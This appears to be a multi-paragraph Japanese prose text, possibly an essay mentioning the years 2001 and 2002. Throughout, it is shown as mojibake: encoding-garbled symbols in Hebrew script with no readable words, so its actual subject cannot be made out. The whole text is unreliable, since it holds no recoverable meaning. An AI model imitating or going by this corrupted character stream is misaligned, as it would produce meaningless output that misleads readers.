ֿ₪₪₪₪«¡¢₪ָ₪₪₪¦²¾ְג₪ע₪¿₪ֶ₪ֶ₪₪₪¹¡£²בµמ₪־»צ·ן¡¦־ע»ֻ₪עְ¶»»₪ַ₪­₪ֶ₪₪₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡£²בµמ₪עְ¶»»₪·₪₪₪₪«₪®₪ך¾­ֽט₪־÷ֶָ¯₪ֿ₪ױ₪»₪²₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡£₪ׂ₪ָ₪ִ₪ׂ₪ָ₪ִ₪־»צ·ן¡¦־ע»ֻ₪עְ¶»»₪¹₪כ₪³₪ָ₪³₪½₪¬÷ֶָ¯₪ע₪ױ₪»₪°¼ך₪ְ₪ֶ₪ֻ₪₪כ₪־₪ַ₪ֿ₪₪₪₪«₪ָ₪־²¾ִך₪ע₪¿₪ֶ₪ֶ₪₪כ¡£ֶַ×»צ·ן₪¬₪ָ₪ך₪ן₪±ֶֻ¹סֶג₪ָֹֻׁ¯₪·₪ֶ₪₪₪כ₪ט₪¦₪ֻ»׳₪¨₪כ₪־₪ְ₪¬¡¢₪½₪ל₪ֿµ₪₪־₪»₪₪₪ְ₪ם₪¦₪«¡£2001ַ¯¥¢¥ב¥ך¥«ֳ÷בװ¶»צ·ן¡¢2002ַ¯9·מֶמµ‏ֶַ×÷®ֶ‏»צ·ן₪₪ֹ₪ג₪¿₪·₪«₪ֻ₪¢₪כ₪³₪ָ₪ֿ₪¢₪ֳ₪¿¡£ֳ±₪ֻ¥ב¥ַ¥£¥¢ףֶ»₪«₪י₪¢₪¿₪¨₪י₪ל₪כ₪«₪¿₪ט₪ֳ₪¿°ץ¾₪ֻ₪¹₪®₪₪₪₪־₪ְ₪ם₪¦₪«¡£
    -¡¡¼ׂ²ס₪״₪־¶¼°ׂ¡¢¥ֶ¥ם₪הְןֱט₪ָ₪₪₪¦₪ָ¡¢µ²²מ₪הֹֿ÷₪₪הָ¯ֵ¸ֵ׃¾ו¹ס₪¬¸¶°ר₪ָ»׳₪₪₪ה₪¹₪₪¡£₪·₪«₪·₪½₪ל₪ֿ₪×₪½₪י₪¯ְט¿¹ס₪־₪×₪ג₪₪₪¢₪¬₪ך₪ְ₪ם₪¦¡£₪¸₪ִ₪־₪ָ₪³₪ם¡¢ְט¿¹סֶגֹפ₪ֻ₪³₪½¶¼°ׂ₪עֽ¶ָ¯₪¹₪כֽ׳°ר₪¬»¶ֽנ₪·₪ֶ₪₪₪כ₪־₪ַ₪ֿ₪₪₪₪«¡£ְ¯¼£₪ה¥ב¥ַ¥£¥¢₪ֶֿגֲ¦₪־¶¼°ׂ₪«₪יּ₪ע₪½₪א₪±₪¿₪¬₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪ֿ₪₪₪₪«¡£₪¹₪ַ₪ֻ¡¢ֶגֲ¦₪־¶¼°ׂ₪ע¸ל₪כַ½־ֿ₪¬₪×₪ָ₪ם₪¨₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪ֿ₪₪₪₪«¡£³°₪«₪י₪ה₪ֳ₪ֶ₪¯₪כ¥¹¥¥ױ¥­¥ף₪ְ₪±₪¬ּהֲך₪₪־₪ַ₪ֿ₪₪₪¡£ּה₪ן₪ל₪ֶ₪₪₪כ₪־₪ֿ¡¢ֶגֲ¦₪ֲֻ¸÷₪¹₪כ¥¹¥¥ױ¥­¥ף₪ָ₪ֹ₪¦₪ה₪ֳ₪ֲֶ׀ֳֿ₪·¡¢₪ֹ₪¦₪ה₪ֳ₪ֶ₪ִ₪­₪¢₪¦₪«₪₪־₪ְ¡£₪½₪ג₪½₪ג¥¹¥¥ױ¥­¥ף₪עַ׃½₪¹₪כ₪³₪ָ₪ֹֿװ²ִַ½₪ְ¡£₪₪¼₪₪י₪׀¥¹¥¥ױ¥­¥ף₪ָ₪ֿ¡¢₪ׂ₪ָ₪ך₪ׂ₪ָ₪ך₪־ֶגֹפ₪ֲֻ¸÷₪¹₪כ₪«₪י₪ְ¡£ ִִֹו₪¹₪®¡£
    -¡¡ֶַ×₪ע₪ן₪¿₪·₪¿₪ֱ¼ׂ²ס₪«₪י´°ֱ´₪ֻ½³°₪¹₪כ₪³₪ָ₪ֿ₪×₪½₪י₪¯ֹװ²ִַ½₪ַ₪¹¡£ֶַ×₪עְ½ֲ₪₪·¡¢ֽרֽׁ₪·¡¢´ֹֽ‎₪¹₪כ₪³₪ָ₪ֻ₪ט₪ֳ₪ֶ₪ן₪¿₪·₪¿₪ֱ₪־¼ׂ²ס₪¬ְ®₪ך־©₪ֳ₪ֶ₪₪₪כ₪«₪י₪ַ₪¹¡£ֶַ×₪¬₪¢₪כ₪³₪ָ₪ֻ₪ט₪ֳ₪ְֶ¸³ט₪¬¾₪µ₪ל₪ֶ₪₪₪כ¡£ְ¶·י¹¥₪­¡¦·יְ­₪־¶¯₪₪ֶֻ₪ֿ₪ָ₪ך₪ן₪±¡¢ֲח־ּ₪־ֶַ₪ע₪₪­₪ֱ₪י₪¹₪³₪ָ₪ֻ₪ט₪ֳ₪ְֶ¸₪­₪ֶ₪₪₪כ¡£¸²½ֵ׿ו½א₪¬¹ג₪¯₪₪ל₪׀₪₪כ₪₪ֹ¡¢ֶַ×₪״₪־°ֲֽ¸ֵ₪¬¹ג₪₪₪־₪¬¸½¼ֲ₪₪־₪ַ₪ֿ₪₪₪₪ְ₪ם₪¦₪«¡£ֲ¸÷₪½₪־₪ג₪־₪¬₪¹₪ַ₪ֻ³־¿®₪־¶¦ָָ¼װ₪₪־₪ְ¡£₪·₪י₪׀₪ֳ₪¯₪ל₪ֶ₪ג₪×₪½₪י₪¯₪ז₪כ₪µ₪ל₪₪₪¡£ָא½ק₪ג¥×¥¦¥א₪ג₪₪®₪ל₪ג₪₪¯¡¢₪ן₪¿₪·₪¿₪ֱ₪־ֽמ₪ָ₪·»ׂ₪₪־₪ַ₪¢₪כ¡£
    -¡¡ֳֿ²¼ֵ´¥µ¥ך¥ף»צ·ן₪ע₪ֿ₪¸₪ב₪ָ₪¹₪כ¸ִ¡¹₪־ֶַ×»צ·ן₪ה¡¢¥¥ֱ¥¹¡¦ִכ¹סֶֻ·³₪₪ְֹןֱט₪ֻ₪×₪±₪כֶַ×¼´ן₪־₪³₪ָ₪ֻ₪ִ₪₪₪ֶ₪ֿ¡¢₪³₪³₪ַ₪ֿ₪ׂ₪ָ₪ִ₪ׂ₪ָ₪ִ₪ױ₪ל₪₪»₪ף¡£₪«₪₪ך¶¯°ת₪ֵ¸³«₪ַ₪¹₪¬¡¢ֶַ×₪־´ֹֽ‎₪ָ₪₪₪¦ְֵ₪ֳַֿ₪ע₪¹₪¹₪ב₪ֶ₪₪¿₪₪₪ָ»׳₪₪₪₪¹¡£
    -¡¡
    -

    ¡צ¡צ¡צ


    -¡¡
    -¡¡ֱ°‎¸ו±¯¡£ֶף½ֵ»°½ֵ₪־ֻ₪ע₪ב₪°₪י₪·₪ֶ₪₪₪כ₪ג₪־¡£¸׀¾ֲ₪ָ־ְ₪¹₪כ₪ג₪־¡£ֲח÷ו¾כ₪ה¹¾¸ֽ¾כ₪₪ֹ₪־¾כ³װ₪ָ₪־־א»ק₪גµ₪₪ֻ₪₪כ₪ָ₪³₪ם₪ַ₪¹₪¬¡¢₪³₪³₪ֳַםּ₪·₪¿₪₪₪־₪ֿ¿ו₪ָ₪־´״·¸¡£ֶא־ֹ¡¦ֲח÷ו₪־₪ג₪־₪ע₪₪כ₪ָ¡¢¿ֳֿ¡¦ְמױ¡¦³₪ױ₪ָ₪₪₪¦־©ֳֿ₪־¶¦ְִֵּ₪¬₪¢₪כ₪ט₪¦₪ֻ¸«₪¨₪כ¡£ֳש¿ו¡¢ץפ¡₪«₪ף₪¬₪₪¡ֻ¡ִ¡ִ¡£₪·₪«₪·₪½₪ל₪¬ֵּ×₪₪י₪׀₪ג₪ֳ₪ָ¹חֽ‎ֵ×₪·ֱֲ־₪¬₪¢₪כ₪ְ₪ם₪¦¡£¹גֲז₪־°ױּ£₪ֿ₪₪ף₪ְ₪ם₪¦¡£³₪¿ו°ּ₪־¾ו¾÷₪ה²ְֿמ₪־ֵָֽפ¡₪ֿ₪ף₪י₪ף¡ֻ₪ָ´״·¸₪₪₪₪ג₪־₪ְ₪ם₪¦₪«¡£¿וֻ׳₪־ָן³²₪ֻ₪¢₪₪₪½₪¦₪₪ָ₪³₪ם₪ֻ½¸ֳז₪·₪ֶ₪₪₪₪₪₪ְ₪ם₪¦₪«¡£ָעֶס½ך₪ָ₪·₪ֶ₪־¹גֲז₪«¡ִ¡ִ¡£₪·₪«₪·₪½₪ל₪₪י₪׀¹­₪₪½׀ֶ‏₪ך¸‎₪¬₪₪±₪ל₪׀ּ·½ג₪¹₪כ¡£
    -¡¡³°³¦₪ָ¼׳ֳַ₪·₪ֶ₪¢₪כ₪³₪ָ₪ַ״ֽר₪ָ₪₪₪¦»ָ₪₪₪₪ֱ₪ג₪¢₪ך₪¨₪כ¡£₪¿₪ָ₪¨₪׀₪ב₪÷₪י₪·₪₪²ֳָ₪־»פ°י¡£³°ֵ¨₪«₪יֹֻ₪°₪³₪ָ₪¬₪ַ₪­₪כ₪·ֶ¨₪²½׀₪¹₪³₪ָ₪ג¾¯₪₪₪₪ְ₪ם₪¦¡£ֹבֳ₪ֳֿ₪·₪ֶ₪×₪₪₪ֶ¡¢ֹ¬ֽ׳₪₪ָ₪­₪ִֹֻ₪₪¹‏₪ף₪ַב₪י₪¨₪כ₪³₪ָ₪¬₪ַ₪­₪כ¡£ּח³°ֹװ½׀₪־÷מ×₪ע°י₪ֶ₪כ₪³₪ָ₪¬₪ַ₪­₪¿₪«₪ג₪·₪ל₪₪₪¡£₪¢₪כ₪₪₪ּֿח³°ֹװ½׀₪־÷מ¶ָ₪ג₪ַ₪­₪כ₪ְ₪ם₪¦¡£₪¿₪ְ₪·₪³₪ל₪ֻ₪גּµֽ‎₪¬₪¢₪כ¡£ְ»₪₪כטֳֿ₪־¾ו₪ַַֿ₪₪ֹ₪ָ₪ֶ₪גֻׂ₪ַ₪­₪₪«₪ֳ₪¿₪ם₪¦₪·¡¢ֻׂ₪¬ֵּ×₪₪י₪׀₪¢₪ל₪₪ֹ₪־־´µ¯₪ֿ°ױּ£₪¬₪₪₪¡£ְּ¼£°ֱ°₪ֿ½׀ֶ‏₪ך₪־´ֹֽ‎₪גָז³׃ֵ×₪ז₪כ₪ה₪«₪ְ₪ֳ₪¿₪ָ₪ג₪₪₪¦¡£¡¢¨ִֹµ­¡§₪³₪־ֲֳֿך₪ֵֿגֶֽ₪¹₪®¡£ֹװֽ׳₪ְ₪ֳ₪¿₪«¡ֻ
    -¡¡
    -¡¡ֹם»ׂ¡₪ײ₪¹¡ֻ¡£₪ג₪·₪¯₪ֿ¡¢₪ײ₪·¡£¥ָ¥ך¥«¥ײ¥ָ¡£¥ָ¥ך¥«¥ײ¥ָ₪ע²עֶַ₪·₪ֶּפֽׁ₪ֻ₪ג₪ֱ₪₪₪כµ»½ׁ₪ֳֿז¹ס₪«₪יֱֵ₪ן₪ֳ₪¿₪י₪·₪₪₪¬¡¢₪½₪ל°ֱ°₪«₪י¥ָ¥ך¥«¥ײ¥ָ₪ֶֻֿ₪ֻ¼«ְ¸₪·₪ֶ₪₪₪¿¡£¥¢¥₪¥ּ₪ֿ¼ם₪ך₪ֻ»ָ₪ֳ₪ֶ₪₪₪¿₪ָ₪ג₪₪₪¦¡£ֹם»ׂ¡₪ײ₪¹¡ֻ₪עֹ®ֶ¬₪ֻ¡¢»³ּמֱנ₪ה₪­₪־₪³₪₪ֹ¼«ְ¸₪¹₪כְֶַ­¿¢×₪ֿ₪«₪¾₪¨₪¢₪²₪ל₪׀₪­₪ך₪¬₪₪₪¡£₪³₪ף₪ֻ₪ֱ₪ַ₪ג₪×₪ג₪₪₪־₪₪«¿ָ₪־²ף₪ך₪ֶַֻ₪ע»‎₪ִ¿¢×₪¬₪¢₪כ₪³₪ָ₪ֻ₪ֿ₪×₪ֹ₪ם₪«₪µ₪ל₪כ¡£¥¹¥₪¥»¥ף¡¢¥¹¥÷¥י¥ף¡¢¥¸¥ד¥¬¥₪¥ג₪־²ך¡ִ¡ִ¡£ֶ°×ְ­₪־ֶַ₪ָ₪·₪ֶ₪ֿ¡¢¥ױ¥°₪ה¥¥א¥·₪₪ֹ₪¬₪¢₪כ¡£¹×ְ­₪־ֶַ₪ָ₪·₪ֶ₪ֿ¿ו¶ה₪ג₪¢₪כ₪·ְ׀¸«¶ה»³₪ָ₪ג₪ט₪׀₪ל₪¿»¦ֱֽ÷₪ג₪¢₪כ¡£₪½₪·₪ֶ₪½₪ל₪י₪ֿ¡¢ֳ±₪ֶַֻ₪¬₪¢₪כ₪ָ₪₪₪¦₪ְ₪±₪ַ₪₪¯₪ֶ¡¢²עֶַ₪·₪¿₪¦₪¨₪ִַ¹₪¯ּפ₪ָ₪·₪ֶ½ֵֽׁ₪µ₪לֲ³₪±₪ֶ₪­₪¿₪ג₪־₪גֲ¿₪₪¡£ֶַ¡£ְ¸₪ָ»א₪ע₪ִ₪«₪µ₪ֹ₪כ־¾µְֱ­¡£
    -¡¡½׀±©»°»³₪ֻ₪«₪®₪י₪÷¡¢¿ְְ»»כ₪µ₪ל₪ֶֶ‏»³₪¬₪­₪׃₪·₪¯ְ©¸ֲ₪µ₪ל₪ֶ₪₪₪¿»³ֳֿ₪ֱֿ´¹ס³ֳֶֿ₪ֻ₪¢₪ך₪₪¹¡£½ק¿ֽ¶״ְ©₪ְ₪±₪ַ₪ֿ₪₪₪¡£ְֳֻ­₪ַ₪גְ©¸ֲ₪µ₪ל₪¿₪ך¡¢»‏´₪ֻ₪ט₪ֳ₪ְֶ©¸ֲ₪µ₪ל₪¿₪ך¡¢ֶ‏»³₪ַ₪­₪כ₪ָ₪³₪ם₪ָ₪ַ₪­₪₪₪₪ָ₪³₪ם₪¬¶ט¬₪µ₪ל₪ֶ₪₪₪¿₪ך¡¢ֶ‏»³₪¹₪כ₪ָ₪·₪ֶ₪ג₪«₪₪י₪÷ְטֶ³₪ֻ½¾₪ן₪₪±₪ל₪׀₪₪י₪₪₪₪ָ₪«¡¢ְ°ָק₪µ₪ל₪¿»³ֶ»₪«₪י₪½₪ל₪ֶ₪ֿ₪₪₪±₪₪₪₪ָ₪«¡£₪×»²¡₪₪₪¡ֻ₪ךֵּ×₪ַ₪¢₪ל¼ם־ִֵּ×₪ַ₪¢₪ל¡¢₪³₪ָ₪³₪₪«₪ֻּףֲ«₪´₪ָ₪¬·ט₪ב₪י₪ל₪ֶ₪₪₪¿¡£»³₪ע₪×₪½₪ל₪¦₪ה₪₪¦ֲ׀¾₪ָ₪·₪¿₪₪₪­₪µ₪ִ₪ֻ₪ֿ¡¢₪­₪ֳ₪ָ₪½₪¦₪₪₪¦»³₪־´ֹֽ‎₪ָ₪₪₪¦ֲ¦ּּ₪¬₪×₪½₪י₪¯₪¢₪ֳ₪¿¡£ִֵָ×₪¬µ²ס¼₪־₪׀₪¢₪₪₪ַ₪ג¡¢»³₪ֻ₪ֿ₪₪₪ם₪₪₪ם¿©₪₪י₪ל₪כ₪ג₪־₪¬₪¢₪כ¡£°­»צ₪ע₪ֿ₪¿₪י₪₪₪ֶ־₪₪ֻ₪₪₪י₪ל₪₪¯₪₪ֳ₪¿₪ג₪־₪¬»³₪״ֶ¨₪²¹‏₪ף₪ַ±£₪ל½»₪ג₪¦₪ָ₪·₪¿₪³₪ָ₪ג₪¢₪ֳ₪¿₪ם₪¦¡£½פָֽ₪־¶­³¦₪ֻ₪ֿ´״½ך¡¦ָײ¾®²°₪¬₪ג₪¦₪±₪י₪ל¡¢¼ך·ֱ₪־³־ַ§₪¬µֱּ³₪ֵ₪±₪י₪ל₪ֶ₪₪₪¿¡£ִֵ¼ֻ₪־»³₪־₪₪¦₪ַ₪ֿ₪½₪ל₪ג₪₪₪₪₪«₪²₪ף₪ְ₪ֳ₪¿₪ף₪¸₪ד₪₪₪₪«₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪־₪ְ₪¬¡¢₪ֹ₪¦₪ה₪י₪ָ₪ף₪ַ₪ג₪₪₪₪י₪·₪₪¡£₪א₪·₪ם»³₪־₪₪¦₪¬₪­₪׃₪·₪¯ֽ»ִּ₪¬₪­₪«₪₪«₪ֳ₪¿₪ָ₪¹₪כ₪א₪­₪ג₪¢₪כ¡£
    -¡¡
    -¡¡₪½₪ל₪ע´ֹֽ‎₪¹₪כ₪־₪¬½₪¸³¼װ₪ְ₪ֳ₪¿₪־₪ַ₪ֿ₪₪₪₪«¡£
    -¡¡³־₪¿₪כ¾µע₪ֿ₪¢₪ך₪₪»₪ף¡£₪±₪ל₪ֹ₪ג½₪¸³¼װ₪ֻֿכֻצ₪־₪³₪ם₪₪ַּ±´ײ°ו־ֵ₪־ֳ´₪₪¼ך₪ַ₪ג₪¢₪ֳ₪¿¡£ֹם»ׂ¡₪ײ₪¹¡ֻ₪הְ׀¸«¶ה»³₪ע₪ֿ₪¸₪ב₪ָ₪·₪¿·א×₪ה´ֱ‎₪ע´ֹֽ‎₪·¡¢ֹ¬ֽ׳₪ֻ±‏₪¸₪ְֶ÷ֿ£₪·₪¿₪ךִ´ְ½₪·₪¿₪ך¶דּ£₪·₪ֶ₪₪ֹ₪³₪·₪ֶ₪₪₪¿₪־₪ַ₪ֿ₪₪₪₪«¡£₪½₪ל₪¬½₪¸³₪־ּע³ה₪־₪ׂ₪ָ₪ִ₪ְ₪ֳ₪¿₪־₪ַ₪ֿ₪₪₪₪«¡£₪½₪¦₪₪₪¦µ»₪עֱָ¿¥ֵ×₪ֱֵֻ¼ר₪¹₪כ½¸ֳִ₪ָ₪·₪ֶ₪־½₪¸³¡£₪½₪ל₪¬¡¢¹¾¸ֽ₪־₪₪«₪´₪ם₪«₪י₪ׂ₪ף₪ׁ₪ף₪ֻ¥×¥י¥ף¥ְ°ו½ׁ₪־ֽ¥₪ל₪¿₪ָ₪³₪ם₪ע₪₪»₪ִ₪±₪י₪ל₪כ₪ֻ₪·₪¿₪¬₪ֳ₪ֶ¡¢¼ׂ²ס₪ֻ₪ְֿ¾ֽ־°ו³״₪״₪־´ֲװ₪¬₪ׂ₪ם₪₪כ¡£µ§ֵר₪ה₪₪¸₪₪₪₪ֻ₪¿₪ט₪כ½₪¸³₪־₪³₪ָ₪ע¡¢₪₪₪ײ₪«₪·₪¬₪ך¿®ֽׁ₪·₪₪¯₪₪כ¡£½₪¸³₪ֿ₪ג₪ֱ₪ם₪ף₪½₪ל₪עֱֻ»₪·₪ט₪¦₪ָ₪¹₪כ¡£ְ¾ֽ־°ו³״₪ֿ¡¢¼«¬₪¿₪ֱ₪־ֲ¸÷₪עִָך₪·₪«₪ֽ₪₪₪₪«₪י₪ְ¡£₪·₪«₪·¸µֽט¡¢°ו־ֵ¹װ°₪ָ₪₪₪¦ֵּ×₪¬ֶ±°ל₪ְ₪«₪י¡¢½₪¸³¼װ₪־₪₪«₪ֻ₪ְֿ¾ֽ־°ו³״₪״µְ¶ב₪¹₪כ₪ג₪־₪¿₪ֱ₪ג₪¢₪ך₪¨₪¿¡£
    -¡¡ֽ־₪־ֵלְ¾₪ע₪ָ₪ן₪÷¡¢½¡¶µ₪ָ₪ֿ²³״₪ַ₪¢₪ך°ו³״₪ַ₪¢₪ֳ₪¿¡£¹©³״₪ַ₪ג₪¢₪ך·³»צ³״₪ַ₪ג₪¢₪ֳ₪¿¡£¼£ְ₪ֲ¦₪ֻ₪ָ₪ֳ₪ֶ₪ֿ¡¢ְטֳ¼²³״₪עֶ³ֶ‏₪¹₪כ₪ֻ₪¢₪¿₪ֳ₪ֶ₪½₪ל₪ֻ₪₪י₪ײ־ֿ₪¬ֲ¸÷₪·₪ֶ₪ג₪י₪ֳ₪ֶ₪ֿ÷₪₪כ¡£ּ±½°₪ֻּ´₪ָ´ץֻ¾₪ע₪¢₪¿₪¨₪כ₪₪₪ג₪ָ₪ֿ¡¢₪ׂ₪ָ₪ִ₪ְ₪±₪ַ₪₪¯₪ֶ₪ֿ₪₪י₪₪₪¡£¥¹¥א¡¼¥÷₪ׁ³׳₪־₪¿₪ב₪ֻ₪ֿ₪₪₪¯₪ִ₪גְֲֽ₪¬₪¢₪ֳ₪ֶ₪ֿ÷₪₪כ₪־₪ְ¡£₪½₪ל₪עֱֻ³²₪¹₪כ₪ג₪־₪ֿ¡¢ֵ°ִלֵ×₪ֻּµ־ֿ²½₪·₪ֱֶָ¿¥₪ע²עֲ־₪·₪₪±₪ל₪׀₪₪י₪₪₪¡£ְּ¼£₪־ַׁ©װּ¼ב¡¦½₪¸³½¡₪־ַׁ»₪ֿ¡¢ְ¯¼£²‏³׳₪ע₪ָ₪ג₪₪ֳ₪¿²³״₪ָ½¡¶µ₪־¥ׁ¥י¥ְ¥₪¥א¡¦¥·¥ױ¥ָ₪ַ₪¢₪ֳ₪¿¡£

    - -

    ¡צ¡צ¡צ

    - -

    ¡¡ֶ£¸¶½¨¹ױ¡£¸וַע²ֻֿ¡¹ִ¡£ֻּ¾ע»‏ֽך¡£ֶןְּµְ®¡£»³ֻ´×½ץ¡£¾ו¿ש¸¬¿®¡£°ֳֻ£µ±½¡¡£¿¿ִֵ¹¬ֲ¼¡£ֹ‏ֹפָ¾ֲ¢¡£»¨²לֲ¹»װ¡£ְֱֶמ²ָ¹¯¡£₪×₪ג₪₪₪ִ₪¯₪₪₪ֻ₪¢₪²₪ֶ₪₪¿₪־₪ְ₪¬¡¢₪³₪ל₪י¿ֽס¦ֹנ¾­₪ֻ¶¦ִּ₪¹₪כ₪־₪ֿ¡ָ½₪¸³₪¯₪µ₪µ¡ֹ₪ְ¡£½₪¸³₪ֿ¡¢ָֹֻׁ₪ֻ»‏₪־ְ¯¼£¸¢־ֿ₪ְֻ¶ב₪·₪ֶ₪₪₪כ₪ט₪¦₪ֻ¸«₪¨₪ֶ₪·₪«₪¿₪¬₪₪₪¡£₪ָ₪­₪ֹֻנ¾­₪ַ₪¢₪ֳ₪¿₪ך¡¢₪ָ₪­₪ִֻ«ִמ₪ַ₪¢₪ֳ₪¿₪ך¡£
    -¡¡½₪¸³₪ֻ₪«₪®₪י₪÷¡¢©¶µ₪ֿ₪·₪׀₪·₪׀ְ¯¼£¸¢־ֿ₪ֶָ±ך׀₪·₪ֶ₪­₪¿¡£ֽרֽׁ₪·₪¿₪ךֽרֽׁ₪µ₪ל₪¿₪ך¡¢ֽרֽׁ₪µ₪ל₪¿₪¢₪²₪¯¼־₪ֶ₪י₪ל₪¿₪ך¡¢ֶ¨₪ל₪ט₪¦₪ָ₪ג₪¬₪₪₪¿₪ך¡£¸ֵ÷£₪־־ע»ֻ₪־ֳז₪ַ½¡¶µ¼װ¡¦²³״¼װ¡¦°ו³״¼װ₪¬ְ¯¼£¸¢־ֿ₪ְָ¿¨₪·₪¿־ד₪ֿ₪½₪ל₪³₪½₪₪₪¯₪י₪ַ₪ג₪¢₪כ¡£₪³₪³₪ַ₪ֿ¥¥ף¥¬¡״ֱףֵ·¹ֿׂ©¡₪ע¥ֶ¥­¥¹¥ָ₪ֱֻגֱא₪ָ²׀ֹ₪ע¸«₪ֶ₪₪כ¡£

    - -

    ¡¡²׀ֹ¡₪«₪ְ¡ֻ¡£»°ְ₪µ×¡¢¸ו´ֱֻצ´₪־ְֱֵג₪־°ו»ױ¡£ֻד¿לּפ¡¦ֻד¨»¶₪ע₪ג₪ֱ₪₪₪ֶ°ו־ֵ₪ע₪₪ֹ₪³₪·₪¿₪ָ₪₪₪ן₪ל₪כ¡£ֱגֱא₪־ֶ¬ִֻ₪ע¸«־©₪ֶ₪¿₪ָ₪ג₪₪₪¦¡£ֱגֱא₪ֿ²׀ֹ₪ֻ¡¢°ו½ׁ₪ע₪ג₪ֳ₪ֶ¼£ְ₪₪ֻ»ֵ₪¨₪ט₪ָּ¿₪¸₪כ¡£₪³₪־¹ס₪־ֲֹ₪ע¼£₪·₪ֶ₪₪ט₪ָ₪₪₪¦¡£ֹװםק¡₪ױ₪ֶ₪₪¡ֻ₪ַ₪¢₪ם₪¦₪¬₪₪«₪ם₪¦₪¬¡¢₪½₪ל₪ֿ÷³ֻצ¡₪µ₪₪ִ¡ֻ₪₪³₪ָ¡£ֽ£÷ֽ¡₪ז₪₪₪¶₪₪¡ֻ¡¢ֽ£¡₪¿₪ְ¡ֻ÷ֽ₪¬₪¢₪ל₪׀ֽׁ₪₪₪ט₪ְָה¶«₪¹₪כֱגֱא¡£₪½₪ל₪ֲֻ׀₪·²׀ֹ₪ֿ¡¢¹סֶס₪־¸¶°ר₪ֿ¼פ₪¬ֹו₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪ַ₪¢₪ך¡¢¼פ₪ֿ¹ס²ָ₪־´נֻ₪ְ₪«₪י¼פ₪עְµ₪¹₪³₪ָ₪₪·₪ֻ¹ס₪־÷¬´´₪ִֿך₪₪י₪ּ₪ָ¸ְ₪₪ײ₪¹¡£ֱגֱא₪ֿ²׀ֹ₪ֻ¡ײ¡ִ¥ֳח·₪־₪´₪ָ₪¯¡ֻ°ו½ׁ₪־»ׂ÷₪ע₪·₪¿₪¿₪ב₪ט¡£ָכֱֵָכ½ׁ₪ע¸ר³«₪·¡¢°ו½ׁ₪ע¹­₪ב₪ט¡׳₪ַָק₪כ¡£½ט‎₪ע¸ר³«₪¹₪כ₪³₪ָ₪ֿ¸ם¿ַ¡¦°­ֽׁ₪ע₪ג¾·₪¯¡£°ו½ׁ₪ֿ½ֿ־‎¼װ₪־₪₪ֻ¸‎ֶ¬₪ֱֵַ¼ר₪¹₪כ₪ג₪־¡¢₪ָ²׀ֹ₪ֿ₪ִ₪ֳ₪ׁ₪ֽ₪«₪¨₪¹¡£»°¹ס»ײ±יµֱ₪ַ₪ֿבֲ×₪µ₪ל¹צ₪ע₪¦₪±₪כ¡£ְµ»ֻ₪ַ₪ג¿¦ּ³´‏₪·₪ֶµ¢¶¿₪·₪¿₪־₪ֱֱגֱא₪ֻ»¦₪µ₪ל₪כ₪ָ₪₪₪¦¡£¸וַ¯¡¢¹¾¸ֽ»‏ֲו¸ו´₪ֻ²ײ²¬ְִ½§₪¬ְ₪³¦½י₪־ֱ´¿ָֻד¿ל¼ך½ׁ₪ע¹װ₪¦₪ג₪ט₪¦₪ֿ¡״²ײ²¬ְִ½§₪־÷¡¡ֽ­µָ÷´ֲֿ»ׂ¡₪¿·ִ¬¼ׂ¡ֻ₪ֻ₪¯₪ן₪·₪₪₪¬¡¢₪½₪ל₪ֿ₪₪¿ּ₪־ֳֿ¡£
    -¡¡ֳֿ₪ֿׁ₪ן₪כ₪¬¡¢÷ְַ¡₪ֿ¶ץ³₪₪ֻּ©¶µ·׀ֵµ₪־ֲ₪·½׀₪·₪ע°ֽֽך₪¹₪כ¡£₪½₪ל₪ֻ²ק₪¯₪³₪¿₪¨₪ֶ₪₪₪¿¶ץ³₪₪ְ₪¬¡¢¡״ֽ‎¼ס¼ב·׀¡₪ָ₪₪₪¦½ס₪־ֲֽ¿₪עֻ¾₪₪ל₪¿₪ָ₪­₪ֻ¡¢₪½₪ל₪ע₪³₪׀₪ף₪ְ¡£¶ץ³₪₪־¸ְ₪₪¬₪ֿ¡¢½ס₪₪₪ֶ₪¢₪כ₪ג₪־₪עֶֹ₪ף₪ַֽ‎²ע₪·₪¿₪ְ₪±₪ַ₪ֿ¡¢₪½₪־¶µ₪¨₪־ֻ¿ן₪עֽ‎²ע₪·₪¿₪³₪ָ₪ֻ₪ֿ₪₪י₪₪₪¡£ֲ־ְֶ₪¹₪כ₪¿₪ב₪ֻ₪ֿ₪ן₪ל₪־₪ג₪ָ₪ֻֽט₪ֶ¡¢ִ¾ְ³״₪׃₪עְֱ₪¦₪ט₪¦₪ֻ¡¢₪ָ₪₪₪¦₪ג₪־₪ַ₪¢₪ֳ₪¿¡£
    -¡¡ֱגֱא₪ָ²׀ֹ¡£÷ְַ¡₪ָ¶ץ³₪¡£₪³₪־₪ױ₪¿₪ִ₪־¥¨¥װ¥½¡¼¥ֹ¡¢₪³₪³₪ַ₪ֿ»צ¼ֲ₪ָ₪־¿¿µ¶₪ֿ₪µ₪₪ֹּהֲך₪ַ₪ֿ₪₪₪¡£¸½ֲו²³״₪ה¸½ֲו°ו³״¡¢₪½₪ל₪«₪י¸½ֲו¼ׂ²ס₪־₪«₪«₪¨₪³₪ף₪ַ₪₪₪כּהֲך₪־³ֻ¿´₪¬¡¢₪¹₪ַ₪ֻ₪³₪³₪ֻ¼‎ּ¡₪·₪ו₪¦₪ל₪ף¡ֻ₪·₪ֶ₪₪₪כ₪³₪ָ₪ֳֻםּ₪ַ₪­₪כ¡£ֱֿ÷מ¼װ₪¿₪ֱ₪¬₪½₪¦₪₪₪¦₪ױ₪¦₪ֶֹֻ₪ב₪כ₪ט₪¦₪ֻ¥¢¥ל¥ף¥¸₪·₪¿¡¢₪ָ₪₪₪¦₪₪¦₪¬ְµ³־₪«₪ג₪·₪ל₪₪₪₪¬¡¢₪½₪ל₪ֿ₪½₪ל₪ְַµ₪·₪₪־ע»ַֻ§¼±₪־₪¢₪ך₪ט₪¦₪ְ¡£
    -¡¡
